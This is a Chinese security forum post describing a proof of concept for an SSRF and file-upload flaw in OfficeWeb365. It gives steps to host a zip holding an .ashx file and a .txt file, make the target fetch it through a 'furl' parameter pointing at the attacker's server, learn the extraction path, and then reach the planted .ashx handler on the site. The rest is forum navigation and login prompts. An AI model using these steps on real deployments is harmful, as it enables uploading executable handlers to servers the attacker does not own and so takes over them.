安全矩阵

 找回密码
 立即注册
搜索
查看: 1100|回复: 0

OfficeWeb365 SSRF&文件上传漏洞 POC

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-8-24 19:14:57 | 显示全部楼层 |阅读模式
需要提前准备 2 个文件,一个 ashx 和一个 txt 文件
将这两个文件打包为 2.zip,然后起一个 http 服务提供给网站远程下载
然后访问?furl=http://你的公网服务器/2.zip
随后即可发现网站对该 zip 进行了下载和解压,这里可以预览 txt 格式文件获取 zippath 参
数的值
然后 ashx 文件的地址即为:
http://x.x.x.x/cache/office/x.x. ... 00010097_486/2.ashx


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:38 , Processed in 0.012497 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表